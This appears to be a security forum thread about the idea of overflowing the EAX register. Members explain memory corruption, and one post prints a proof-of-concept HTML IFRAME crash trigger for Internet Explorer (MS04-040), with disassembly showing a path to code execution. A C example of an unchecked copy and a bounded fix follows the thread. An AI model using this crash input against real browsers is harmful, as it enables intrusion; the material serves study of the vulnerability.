Thread: EAX overflow (An Idea)

  1. #1 H@CK3R_ADI (Garage Member)

    EAX overflow (An Idea)

    Hello to all Garagians. Yesterday I got an idea: what about doing an EAX overflow? I just wanted to know what you think about this idea....

    Your questions, comments, suggestions, etc. are welcome.

  2. #2 sebas_phoenix (Garage Member)
    Quote Originally Posted by H@CK3R_ADI:
        Hello to all Garagians. Yesterday I got an idea: what about doing an EAX overflow? I just wanted to know what you think about this idea....

        Your questions, comments, suggestions, etc. are welcome.

    Be more elaborate! There is no such thing as a register overflow (except arithmetic overflow, but that is not relevant to our discussion here); what actually happens is that we overflow the memory from where the register gets these values! So yeah, it doesn't matter if it is EAX or EBX or whatever, as long as the condition facilitates code execution!

  3. #3 "vinnu" (Security Researcher)
    EAX (or any register) is a kind of bucket: we sink it in a big tank, no matter how much it is filled (or even overflowed), then take it out; it will contain only its fixed volume at most, every time, no matter how long you keep it inside the tank.

    Kindly specify, how you want to overflow EAX otherwise?

  4. #4 fb1h2s (Security Researcher)
    Well, I think what you are trying to convey is that you tried some fuzzing and the app crashed with the EAX register overflown!!! Anyway, sebas has explained where you are wrong.

    The general idea is to get control of the program flow by taking control over some instruction via a controlled register.

    Check out this exploit.

    Garage4hackers Forum - dbpwoerammpl local exploit a different scenario

    Cheers.
    Hacking Is a Matter of Time, Knowledge and Patience

  5. #5 H@CK3R_ADI (Garage Member)
    What about doing an indirect overflow that first loads it into the registers and then into memory?

  6. #6 "vinnu" (Security Researcher)
    Overflowing my memory; elaborate a little more, this could be a new technique or may lead to a zero-day... "vinnu"

  7. #7 H@CK3R_ADI (Garage Member)
    This can be used to bypass security system(s): just load the value in a register, then into memory... What do you think? What about using this to execute malicious code?

  8. #8 sebas_phoenix (Garage Member)
    Quote Originally Posted by H@CK3R_ADI:
        This can be used to bypass security system(s): just load the value in a register, then into memory... What do you think? What about using this to execute malicious code?

    Kindly be more elaborate by providing some pseudocode as to how you think it might happen! Then it will be easier for others to clarify.

  9. #9 Rashid bhatt (Garage Newcomer)
    EAX can't be overflowed (because, of course, it's a register and not a memory range), but it can be written with bogus values, and such exploits already exist; not a new concept, though. One of those is a use-after-free.

    A classical example would be Microsoft Security Bulletin MS04-040: Cumulative Security Update for Internet Explorer (889293)

    Code:
    <HTML>
    <body>
    <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"></IFRAME>
    </body>
    </HTML>

    It triggers a crash in SHDOCVW.dll:

    Code:
    769F6D36 8B45 08          MOV EAX,DWORD PTR SS:[EBP+8]      // parameter overwritten on the stack
    769F6D39 85C0             TEST EAX,EAX
    769F6D3B ^0F84 45FBFFFF   JE SHDOCVW.769F6886
    769F6D41 E9 560E0100      JMP SHDOCVW.76A07B9C
    769F6D46 8B4424 04        MOV EAX,DWORD PTR SS:[ESP+4]
    769F6D4A 8B80 00140000    MOV EAX,DWORD PTR DS:[EAX+1400]
    769F6D50 85C0             TEST EAX,EAX
    769F6D52 0F84 330E0100    JE SHDOCVW.76A07B8B
    769F6D58 FF7424 08        PUSH DWORD PTR SS:[ESP+8]
    769F6D5C 8B08             MOV ECX,DWORD PTR DS:[EAX]        // this is where things get shaped up?? works with a heap spray
    769F6D5E 68 98659C76      PUSH SHDOCVW.769C6598
    769F6D63 50               PUSH EAX
    769F6D64 FF11             CALL DWORD PTR DS:[ECX]


    Thanks!

  10. #10 "vinnu" (Security Researcher)
    Namaste

    Note the instructions:

    Code:
    769F6D5C 8B08             MOV ECX,DWORD PTR DS:[EAX]        // this is where things get shaped up?? works with a heap spray
    769F6D5E 68 98659C76      PUSH SHDOCVW.769C6598
    769F6D63 50               PUSH EAX
    769F6D64 FF11             CALL DWORD PTR DS:[ECX]

    What else do you need? It's a direct code execution vulnerability, and if you control EAX you control ECX, and there you are.

    EAX doesn't get any bogus value, but user-supplied input (directly or indirectly, in this case).

    Again, registers do not overflow, but only take values according to their volume (bits, like 32-bit, 16-bit, 64-bit, etc.), and EAX takes a DWORD (all 32-bit general purpose registers do, and EAX is a 32-bit general purpose register).

    A bucket will always contain a fixed volume every time you fill it completely (up to its maximum limit), and the overflowing water is spilled out of it, not inside the bucket.

    ..."vinnu"
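The two points the thread keeps returning to, that a register has a fixed width and cannot overflow (posts #2, #3 and #10) and that what actually gets corrupted is the memory slot the register is later loaded from, which a `TEST EAX,EAX` null check does not catch (posts #9 and #10), can be shown in a few lines of C. The following is an added example, not code from the thread or from the MS04-040 advisory: the 16-byte name slot, the 4-byte pointer slot behind it, the "legitimate" pointer value and the 20-byte input are all constructed for the demonstration and have nothing to do with the real SHDOCVW layout.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed memory layout for the demonstration: a 16-byte name slot
 * followed by a 4-byte slot holding the object pointer that the crashing
 * code later loads with MOV EAX,DWORD PTR [..]. Not the real IE layout. */
#define NAME_LEN 16u
#define SLOT_LEN (NAME_LEN + 4u)

/* A 32-bit register modelled as uint32_t: whatever is loaded is truncated
 * to 32 bits and nothing spills into a neighbour (the bucket analogy). */
uint32_t load_into_reg(uint64_t value)
{
    return (uint32_t)value;
}

/* Unchecked copy into the name slot. Bytes beyond NAME_LEN land in the
 * pointer slot: this is the memory overflow that feeds the register. */
void unsafe_fill(unsigned char *slot, const char *src, size_t n)
{
    memcpy(slot, src, n);                 /* no bound on n */
}

/* Bounded copy: rejects input that does not fit the name slot. */
int safe_fill(unsigned char *slot, const char *src, size_t n)
{
    if (n > NAME_LEN)
        return 0;
    memcpy(slot, src, n);
    return 1;
}

/* MOV EAX,[slot+16]: the register simply takes the 4 bytes found there. */
uint32_t load_obj(const unsigned char *slot)
{
    uint32_t obj;
    memcpy(&obj, slot + NAME_LEN, sizeof obj);
    return obj;
}

/* TEST EAX,EAX / JE only rejects a NULL pointer; any other value passes
 * and would be dereferenced by MOV ECX,[EAX] / CALL [ECX]. */
int passes_null_check(uint32_t eax)
{
    return eax != 0;
}

/* Runs the constructed scenario and returns the value the register sees.
 * hardened == 0 uses unsafe_fill, hardened != 0 uses safe_fill. */
uint32_t scenario(int hardened)
{
    unsigned char slot[SLOT_LEN];
    uint32_t valid = 0x00400000u;         /* constructed legitimate pointer */
    char input[SLOT_LEN];

    memset(slot, 0, sizeof slot);
    memcpy(slot + NAME_LEN, &valid, sizeof valid);
    memset(input, 'B', sizeof input);     /* 20 x 'B', as in the post's BBBB... */

    if (hardened)
        safe_fill(slot, input, sizeof input);
    else
        unsafe_fill(slot, input, sizeof input);
    return load_obj(slot);
}

int main(void)
{
    printf("64-bit 0x1FFFFFFFF into a 32-bit register: 0x%08x\n",
           (unsigned)load_into_reg(0x1FFFFFFFFull));
    printf("pointer slot after unchecked copy: 0x%08x (null check passes: %d)\n",
           (unsigned)scenario(0), passes_null_check(scenario(0)));
    printf("pointer slot after bounded copy:   0x%08x\n", (unsigned)scenario(1));
    return 0;
}
```

The first line of output shows the bucket: loading a 64-bit value into a 32-bit register just drops the high bits, nothing else changes. The second shows the thread's real subject: the unchecked copy turns the pointer slot into 0x42424242, and a null check lets that through, which is why a bounds check on the copy (or never leaving a freed object's pointer reachable, in the use-after-free case) is the fix, not anything done to the register.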
